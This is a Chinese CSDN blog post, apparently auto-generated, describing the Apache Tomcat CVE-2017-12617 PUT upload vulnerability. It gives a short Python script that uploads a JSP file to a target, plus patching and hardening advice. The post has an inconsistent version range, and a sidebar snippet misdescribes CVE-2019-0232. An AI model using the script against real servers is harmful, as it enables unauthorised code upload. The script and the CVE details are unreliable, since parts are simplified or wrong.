Apache Tomcat 远程代码执行漏洞教程

于 2024-08-27 10:01:50 发布
阅读量246 收藏 9
点赞数 14
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00991/article/details/141595042
版权

Apache Tomcat 远程代码执行漏洞教程

CVE-2017-12617Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2017-12617

项目介绍

本项目针对Apache Tomcat中的一个已知漏洞CVE-2017-12617进行研究。该漏洞允许在特定条件下通过HTTP PUT方法执行远程代码。受影响的版本包括Tomcat 9.0.1 (Beta) 之前的版本、8.5.23 之前的版本、8.0.47 之前的版本以及7.0.82 之前的版本。

项目快速启动

环境准备

  1. 确保你有一个受影响的Tomcat版本。
  2. 配置Tomcat允许HTTP PUT方法,通过设置read-only参数为false

代码示例

以下是一个简单的Python脚本,用于利用该漏洞上传并执行一个JSP文件:

import requests

url = 'http://your-target-ip:8080/upload/'
file_content = '<% out.println("Hello, World!"); %>'
file_name = 'test.jsp'

headers = {
    'Content-Type': 'application/octet-stream',
    'X-File-Name': file_name
}

response = requests.put(url + file_name, data=file_content, headers=headers)

if response.status_code == 201:
    print("File uploaded successfully.")
    print("Visit {} to see the result.".format(url + file_name))
else:
    print("Failed to upload file.")

应用案例和最佳实践

应用案例

该漏洞常被用于渗透测试和安全评估中,以验证系统的安全性。例如,安全团队可以使用此漏洞来测试其防御机制是否能够阻止此类攻击。

最佳实践

  1. 及时更新:确保Tomcat服务器更新到最新版本,以避免已知漏洞。
  2. 禁用不必要的功能:在生产环境中,禁用HTTP PUT方法,除非明确需要。
  3. 监控和日志:实施严格的日志记录和监控,以便及时发现和响应异常活动。

典型生态项目

Apache Tomcat

Apache Tomcat是一个开源的Web服务器和Servlet容器,实现了Java Servlet、JavaServer Pages (JSP)、Java EL和WebSocket技术。它是Java Web应用最常用的服务器之一。

Apache Maven

Apache Maven是一个项目管理和理解工具,主要用于Java项目的构建。它提供了一个统一的构建系统、项目信息和最佳实践开发指南。

Jenkins

Jenkins是一个开源的持续集成工具,用于监控持续重复的工作,包括构建、测试和部署软件。它支持各种插件,可以与多种工具集成,包括Tomcat。

通过这些工具和项目的结合使用,可以构建一个强大的开发和部署环境,确保应用程序的安全性和稳定性。

CVE-2017-12617Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2017-12617

喻珺闽
关注
  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Apache tomcat远程代码执行验证代码
04-16
这个标题和描述提到了"Apache Tomcat远程代码执行验证代码",这通常涉及到一个安全漏洞,允许攻击者通过发送特定的HTTP请求在服务器上执行任意代码远程代码执行(RCE)是一种严重的安全风险,它允许攻击者在目标...
tomcat远程代码执行漏洞验证
04-17
### Tomcat远程代码执行漏洞详解 #### 一、漏洞背景 Apache Tomcat 是一款开源的Servlet容器,它能够实现对Servlet 2.2 和后来版本规范的支持,同时也提供了作为开发和部署Java应用程序的一种完整策略。Tomcat 在...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
通用的C++数据结构代码实现,使用模板
08-26
通用的C++数据结构代码实现,使用模板
ant-design-vue-1.2.2.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
基于Django完成一个企业级的官方网站的制作.zip
最新发布
08-26
基于Django完成一个企业级的官方网站的制作.zip
springboot364高校科研信息管理系统pf.zip
08-26
信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古以来的短板,有效的提升管理的效率和业务水平。传统的管理模式,时间越久管理的内容越多,也需要更多的人来对数据进行整理,并且数据的汇总查询方面效率也是极其的低下,并且数据安全方面永远不会保证安全性能。结合数据内容管理的种种缺点,在互联网时代都可以得到有效的补充。结合先进的互联网技术,开发符合需求的软件,让数据内容管理不管是从录入的及时性,查看的及时性还是汇总分析的及时性,都能让正确率达到最高,管理更加的科学和便捷。本次开发的高校科研信息管理系统实现了操作日志管理、字典管理、反馈管理、公告管理、科研成果管理、科研项目管理、通知管理、学术活动管理、学院部门管理、科研人员管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让高校科研信息管理系统更能从理念走到现实,确确实实的让人们提升信息处理效率。
springboot363高校竞赛管理系统--pf.zip
08-26
高校竞赛管理系统管理系统按照操作主体分为管理员和用户。管理员的功能包括字典管理、论坛管理、竞赛公告管理、获奖管理、老师管理、评审管理、评审分配管理、评审打分管理、赛事管理、赛事提交管理、赛事报名管理、用户管理、专家管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 高校竞赛管理系统管理系统可以提高高校竞赛管理系统信息管理问题的解决效率,优化高校竞赛管理系统信息处理流程,保证高校竞赛管理系统信息数据的安全,它是一个非常可靠,非常安全的应用程序。
ssm455重庆理工大学心理咨询管理子系统的分析与实现+jsp.zip
08-26
重庆理工大学心理咨询管理子系统主要是为学生提供心理咨询服务,该系统实现的功能包括学生基本信息管理,教师基本信息管理、队列查询、咨询预约,咨询报告等。
基于Django+Bootstrap框架,设计微型小说网站.zip
08-26
基于Django+Bootstrap框架,设计微型小说网站.zip
租房平台源码 (优秀毕业设计源码)
08-26
1. 租房平台代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
springboot362在线租房和招聘平台pf.zip
08-26
在线租房和招聘平台管理系统按照操作主体分为管理员和用户。管理员的功能包括字典管理、房东管理、房屋管理、房屋收藏管理、房屋评价管理、房屋订单管理、论坛管理、平台资讯管理、企业管理、简历管理、简历投递管理、用户管理、职位招聘管理、职位收藏管理、职位留言管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 在线租房和招聘平台管理系统可以提高在线租房和招聘平台信息管理问题的解决效率,优化在线租房和招聘平台信息处理流程,保证在线租房和招聘平台信息数据的安全,它是一个非常可靠,非常安全的应用程序。
前置资源haproxy.zip
08-26
haproxy和cdn
ant-design-vue-1.3.17.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ant-design-vue-1.5.0-rc.7.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ssm496图书管理系统的设计与实现+jsp.zip
08-26
对图书馆进行了一定的考察和分析后,决定设计一个信息化的图书管理系统,采用Java语言技术进行开发,Mysql数据库进行数据存储,页面技术采用Div+css进行布局设计,通过采用这些技术在功能方面更加的完善,界面方面也更加的美观,符合现代人的审美。经过技术的发展目前的图书馆里一般也采用了计算机图书管理系统,但是这一般都是仅限管理员进行使用,对图书进行管理,有一定的局限性,没有考虑到读者,所以经过一番考研调查后,决定在该基础上额外加上用户,让读者都可以参与进来,这样不单单是方便了管理员,对于读者来说借阅图书也更加的方便,直接通过系统就可以查询到具体的借阅信息。
ant-design-vue-3.0.0-alpha.0.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

喻珺闽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值